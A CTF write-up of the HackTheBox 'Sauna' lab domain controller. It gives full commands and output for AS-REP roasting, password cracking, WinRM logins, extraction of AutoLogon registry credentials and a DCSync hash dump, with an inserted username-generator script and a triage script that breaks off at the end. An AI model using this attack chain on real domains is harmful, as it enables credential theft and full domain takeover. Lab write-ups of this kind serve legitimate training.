HackTheBox - Sauna 🔥💥


Quick Summary

→ A fun Windows box running Active Directory. The website on port 80 leaks employee names on its about-us page. Brute-forcing web directories turned up nothing, and enum4linux gave little beyond the domain name and SID, but the names were enough: GetNPUsers.py found that FSmith has Kerberos pre-authentication disabled, so I could request an AS-REP for him, crack it with john and grab user.txt over WinRM. For privilege escalation, WinPEAS found AutoLogon credentials for svc_loanmgr stored in the registry. That account holds DCSync (directory replication) rights on the domain, so secretsdump.py could pull the Administrator NT hash, and psexec.py with that hash gave me a SYSTEM shell and root.txt.


Penetration Testing Methodologies

  1. Network Scanning

    → Nmap scan

    → discover open ports and the services running on them

  2. Enumeration

    → visit the website looking for hints

    → found possible usernames on the about-us page

  3. User Enumeration

    → brute force web directories with dirsearch

    → enumerate the box over SMB/RPC with enum4linux

    → build a username list from the about-us names with common naming variations

  4. Exploitation

    → check for accounts with Kerberos pre-authentication disabled and AS-REP roast them

    → GetNPUsers.py returned the AS-REP hash for FSmith

    → crack the hash with john

    → log in as FSmith with evil-winrm and grab user.txt

  5. Privilege Escalation

    → upload and run WinPEAS to look for credentials and misconfigurations

    → found AutoLogon credentials for svc_loanmgr in the registry

    → log in as svc_loanmgr with evil-winrm

    → svc_loanmgr has the GetChanges/GetChangesAll (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) rights on the domain, so it can perform a DCSync attack

    → dump the Administrator NT hash with secretsdump.py

    → pass the hash with psexec.py to get a SYSTEM shell and grab root.txt


Network Scanning

Walkthrough

→ I always begin with Nmap to see which services are running. The flags I use:


  • -sV ⇒ probe open ports to determine service/version info
  • -sC ⇒ run the default NSE scripts (equivalent to --script=default)
  • -A ⇒ aggressive scan: OS detection, version detection, script scanning and traceroute (it already implies -sV and -sC)
  • -T4 ⇒ faster timing template
  • -oN ⇒ save the results to a text file


root in htb/boxes/Sauna
❯ nmap -sV -sC -T4 -A 10.10.10.175 -oN nmap-Sauna
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 07:17 PST
Nmap scan report for 10.10.10.175
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-21 06:21:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/21%Time=5E754F50%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m24s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-21T06:23:55
|_ start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 211.01 ms 10.10.14.1
2 50.45 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 395.18 seconds

root in htb/boxes/Sauna took 6m35s
❯


Nmap results

There are a lot of open ports, and together they identify the host as a domain controller for EGOTISTICAL-BANK.LOCAL (DNS on 53, Kerberos on 88, LDAP on 389/3268, SMB on 445). The ones that matter for the initial foothold:

  • 80 ⇒ IIS web server
  • 88 ⇒ Kerberos, which is what makes AS-REP roasting possible
  • 5985 ⇒ WinRM. Note that 5985 is not in Nmap's default top-1000 port list, so it does not appear in the scan above; a full scan (-p-) or an explicit -p 5985 is needed to confirm it before trying evil-winrm.

The 7-hour clock skew reported by the host scripts is also worth noting: Kerberos tolerates only a few minutes of skew, so anything that later authenticates to this DC with Kerberos tickets needs the attacking machine's clock adjusted to match (for example with ntpdate against 10.10.10.175).

Enumeration

The Sauna Website

Since there is a web service, I always look at that first.

[Screenshot: Egotistical Bank home page on http://10.10.10.175/]

On the about-us page I found a list of staff names, which are candidate usernames:

[Screenshot: about-us page listing the bank's team members]


User Enumeration

Enumerating users

The site itself had nothing else of interest, so I brute forced web directories, as I always do against a web target:


root in htb/boxes/Sauna
❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.175/" -e asd -t 20 --simple-report=sauna-directories

_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109

Error Log: /opt/dirsearch/logs/errors-20-03-21_07-40-57.log

Target: http://10.10.10.175/

[07:40:59] Starting:
[07:41:00] 403 - 312B - /%2e%2e/google.com
[07:41:52] 301 - 147B - /css -> http://10.10.10.175/css/
[07:42:08] 301 - 149B - /fonts -> http://10.10.10.175/fonts/
[07:42:18] 301 - 150B - /images -> http://10.10.10.175/images/
[07:42:18] 301 - 150B - /Images -> http://10.10.10.175/Images/
[07:42:19] 200 - 32KB - /index.html

Task Completed

root in htb/boxes/Sauna took 2m15s
❯

That turned up only static asset directories, so I ran enum4linux to see what SMB/RPC gives away to an anonymous session:


root in htb/boxes/Sauna
❯ enum4linux 10.10.10.175
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 21 08:02:10 2020

==========================
| Target Information |
==========================
Target ........... 10.10.10.175
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================
| Enumerating Workgroup/Domain on 10.10.10.175 |
====================================================
[E] Can't find workgroup/domain


============================================
| Nbtstat Information for 10.10.10.175 |
============================================
Looking up status of 10.10.10.175
No reply from 10.10.10.175

=====================================
| Session Check on 10.10.10.175 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.175 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

===========================================
| Getting domain SID for 10.10.10.175 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
[+] Host is part of a domain (not a workgroup)

======================================
| OS information on 10.10.10.175 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.175 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.175 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

=============================
| Users on 10.10.10.175 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

=========================================
| Share Enumeration on 10.10.10.175 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.175

====================================================
| Password Policy Information for 10.10.10.175 |
====================================================
[E] Unexpected error from polenum:


[+] Attaching to 10.10.10.175 using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:10.10.10.175)

[+] Trying protocol 445/SMB...

[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[E] Failed to get password policy with rpcclient


==============================
| Groups on 10.10.10.175 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

=======================================================================
| Users on 10.10.10.175 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.

=============================================
| Getting printer info for 10.10.10.175 |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Sat Mar 21 08:03:39 2020


root in htb/boxes/Sauna took 1m29s
❯


Not much comes back anonymously: a null session is accepted, but user, group, share and password-policy enumeration are all NT_STATUS_ACCESS_DENIED, and RID cycling is not possible. What we do learn is the NetBIOS domain name EGOTISTICALBANK and the domain SID; together with the LDAP banner from Nmap (EGOTISTICAL-BANK.LOCAL) and Kerberos on port 88, that is enough to try Kerberos-based user enumeration instead.

I built users.txt from the names on the about-us page, with several username variations for each (first.last and first-initial plus last name are the most common Active Directory conventions):


Fergus.Smith
Fergus.a.Smith
FSmith
fsmith
FaSmith
FeSmith
FeaSmith
Hugo.Bear
Hugo.a.Bear
HBear
HaBear
HuBear
HuaBear
Steven.Kerb
Steven.a.Kerb
SKerb
SaKerb
StKerb
StaKerb
Shaun.Coins
Shaun.a.Coins
SCoins
SaCoins
ShCoins
ShaCoins
Bowie.Taylor
Bowie.a.Taylor
BTaylor
BaTaylor
BoTaylor
BoaTaylor
Sophie.Driver
Sophie.a.Driver
SDriver
SaDriver
SoDriver
SoaDriver
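The list above was typed by hand. As an added example (not the author's script), here is a small Python generator for the username conventions Active Directory shops usually use, seeded with the six names from the about-us page; the pattern list is an assumption about common naming conventions, not something the page documents. Kerberos principal lookups are case-insensitive, so one casing per pattern is enough (the duplicate FSmith/fsmith hashes returned later on this page are the same account).

```python
#!/usr/bin/env python3
"""Generate candidate AD usernames from full names (added example).

Kerberos principal lookups are case-insensitive, so one casing per
pattern is enough; feeding both FSmith and fsmith to GetNPUsers.py
just yields the same AS-REP twice.
"""
import sys

# Names taken from the Egotistical Bank about-us page, as listed above.
ABOUT_US_NAMES = [
    "Fergus Smith", "Hugo Bear", "Steven Kerb",
    "Shaun Coins", "Bowie Taylor", "Sophie Driver",
]

# Assumed common username patterns over (first, last,
# f = first initial, l = last initial).
PATTERNS = [
    "{first}.{last}",   # fergus.smith
    "{first}{last}",    # fergussmith
    "{first}_{last}",   # fergus_smith
    "{f}{last}",        # fsmith   <- the convention in use on Sauna
    "{f}.{last}",       # f.smith
    "{f}_{last}",       # f_smith
    "{first}{l}",       # ferguss
    "{first}.{l}",      # fergus.s
    "{last}{f}",        # smithf
    "{last}.{first}",   # smith.fergus
    "{first}",          # fergus
    "{last}",           # smith
]


def generate_usernames(full_name):
    """Return de-duplicated lowercase candidates for one person.

    Only the first and last whitespace-separated tokens are used, so a
    middle name or initial ("Fergus A. Smith") does not change the output.
    """
    parts = full_name.strip().split()
    if len(parts) < 2:
        return [parts[0].lower()] if parts else []
    first, last = parts[0].lower(), parts[-1].lower()
    fields = {"first": first, "last": last, "f": first[0], "l": last[0]}
    seen, out = set(), []
    for pattern in PATTERNS:
        cand = pattern.format(**fields)
        if cand not in seen:       # e.g. "A Smith" makes asmith twice
            seen.add(cand)
            out.append(cand)
    return out


def build_userlist(names):
    """Flatten candidates for many names, keeping order, without duplicates."""
    seen, result = set(), []
    for name in names:
        for cand in generate_usernames(name):
            if cand not in seen:
                seen.add(cand)
                result.append(cand)
    return result


if __name__ == "__main__":
    # Usage: python3 gen_users.py > users.txt
    #    or: cat names.txt | python3 gen_users.py > users.txt
    names = ABOUT_US_NAMES
    if not sys.stdin.isatty():
        names = [line for line in sys.stdin.read().splitlines() if line.strip()]
    print("\n".join(build_userlist(names)))
```

The output is ready to feed to GetNPUsers.py -usersfile; on this box the hit comes from the `{f}{last}` pattern.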


Exploitation

Kerberos Pre-Authentication

With a user list in hand, the next step is to check whether any of these accounts has Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag in userAccountControl). Normally the KDC requires the client to prove knowledge of the password before it returns anything; when pre-auth is disabled, anyone can send an AS-REQ for that user and receive an AS-REP whose encrypted part is protected with a key derived from the user's password. With RC4-HMAC (etype 23) that key is simply the NT hash, so the blob can be cracked offline. This is AS-REP roasting. Usernames that do not exist come back as KDC_ERR_C_PRINCIPAL_UNKNOWN, which also makes the same request a usable user-enumeration check.

I grabbed the AS-REPs with Impacket's GetNPUsers.py:


root in htb/boxes/Sauna via 🐍 v2.7.17
❯ python GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -outputfile result.txt -dc-ip 10.10.10.175
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

root in htb/boxes/Sauna via 🐍 v2.7.17 took 24s
❯ ls
GetNPUsers.py nmap-Sauna payaso.py result.txt sauna-directories users.txt

Looking at the result file, FSmith has pre-authentication disabled and I get his AS-REP hash. It appears twice because both FSmith and fsmith were in users.txt; Kerberos principal names are looked up case-insensitively, so these are the same account and the same password:


root in htb/boxes/Sauna via 🐍 v2.7.17
❯ cat result.txt
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:8495bdf34711fd79334bb5c80d64fb42$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
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:fa1c6693421661b8cf10a966cf45ff47$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

root in htb/boxes/Sauna via 🐍 v2.7.17
❯


Now that I have the hash it's time to crack it with john. The $krb5asrep$23$ prefix lets john pick the format (krb5asrep) on its own; the hashcat equivalent is mode 18200:


root in htb/boxes/Sauna via 🐍 v2.7.17
❯ john result.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
2g 0:00:00:58 DONE (2020-03-21 08:43) 0.03437g/s 181144p/s 362289c/s 362289C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root in htb/boxes/Sauna via 🐍 v2.7.17 took 59s
❯

Grab user.txt

I have the password Thestrokes23, so now I can use evil-winrm to log in as FSmith over WinRM (port 5985) and grab user.txt:


root in evil-winrm on master via 💎 v2.5.7
❯ ruby evil-winrm.rb -i 10.10.10.175 -u FSmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls


Directory: C:\Users\FSmith\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> more user.txt
20b98d97

*Evil-WinRM* PS C:\Users\FSmith\Desktop>



Privilege Escalation

Escalating to svc_loanmgr

Listing C:\Users shows one more non-default account on the box, svc_loanmgr:


*Evil-WinRM* PS C:\users> ls


Directory: C:\users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr

I need to move to svc_loanmgr but had nothing obvious to go on, so I uploaded and ran WinPEAS. It found AutoLogon credentials stored in plaintext in the registry:

[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!

DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!

So the password is Moneymakestheworldgoround!. Note the registry says svc_loanmanager while the actual account, in C:\Users and in the domain, is svc_loanmgr; the password is the one for svc_loanmgr. Windows AutoLogon keeps these values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (DefaultDomainName, DefaultUserName, DefaultPassword), and that key is readable by ordinary users, which is exactly what WinPEAS checked.

The same thing can be found without any tooling by searching HKLM for REG_SZ values whose name contains "password" with reg query HKLM /f password /t REG_SZ /s. Most of the hits are noise from UI components; the Winlogon DefaultPassword entry is the one that matters:


*Evil-WinRM* PS C:\Users\FSmith\Desktop> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{29EA1611-529B-4113-8EE3-EE0F6DD2C715}
(Default) REG_SZ RASGCW Change Password Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{3bfe6eb7-281d-4333-999e-e949e3621de7}
(Default) REG_SZ Cert Password UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{9cb233a5-a4a5-46b9-ab13-db07ce949410}
(Default) REG_SZ Password retry UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{d9162b5b-ca81-476e-a310-cb32d932733c}
(Default) REG_SZ Password Expired UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
DefaultPassword REG_SZ Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
FilterIn REG_SZ FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a}
(Default) REG_SZ PicturePasswordLogonProvider

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{60b78e88-ead8-445c-9cfd-0b87f74ea6cd}
(Default) REG_SZ PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
Text REG_SZ Prompt for user name and password

Login as svc_loanmgr

From FSmith's shell I now log in as svc_loanmgr with evil-winrm (the same command as before, with the svc_loanmgr username and the AutoLogon password) and start enumerating again:


*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> whoami /all

USER INFORMATION
----------------

User Name SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\Users\svc_loanmgr>

Nothing in the group memberships or privileges stands out, and that is expected: DCSync rights are neither a group nor a Windows privilege but an ACL on the domain object itself, so whoami /all can never show them. I ran BloodHound to map the domain and its ACLs:

[Screenshot: BloodHound graph showing svc_loanmgr's DCSync (GetChangesAll) edge to the EGOTISTICAL-BANK.LOCAL domain object]

It shows that svc_loanmgr has been granted the replication rights on the domain (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, the GetChanges/GetChangesAll edges in BloodHound). Those are the rights a domain controller needs to replicate from its peers, so any account holding them can ask the DC for account secrets over DRSUAPI (IDL_DRSGetNCChanges) exactly as another DC would. That is the DCSync attack.

I abused this with Impacket's secretsdump.py (-just-dc limits it to the NTDS secrets fetched via DRSUAPI instead of also trying SAM and LSA) and extracted the Administrator NT hash:


root in impacket/examples on master via 🐍 v2.7.17
❯ python secretsdump.py EGOTISTICALBANK/svc_loanmgr@10.10.10.175 -just-dc
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:97d33cc179ece045b9dd8f8ecd61a944:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:c9d865558b9ce09f6589ed79a4f9354c128b168f5b1dfa5712cce47a741e7df2
SAUNA$:aes128-cts-hmac-sha1-96:72c6fee92ba584acb19a4a1d7d2e876c
SAUNA$:des-cbc-md5:da0794d52c5eab5e
[*] Cleaning up...

root in impacket/examples on master via 🐍 v2.7.17 took 51s
❯
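Reading a dump like this by eye is error-prone, so here is an added Python example (not the writeup's or Impacket's code) that parses the domain\uid:rid:lmhash:nthash::: lines above, groups accounts by NT hash and flags the usual findings. Its sample input is the dump shown above, copied as-is; the triage rules (empty NT hash, stored LM hash, machine account, RIDs 500 and 502) are general knowledge, not something the page states.

```python
#!/usr/bin/env python3
"""Triage a secretsdump.py -just-dc dump (added example, not the writeup's code).

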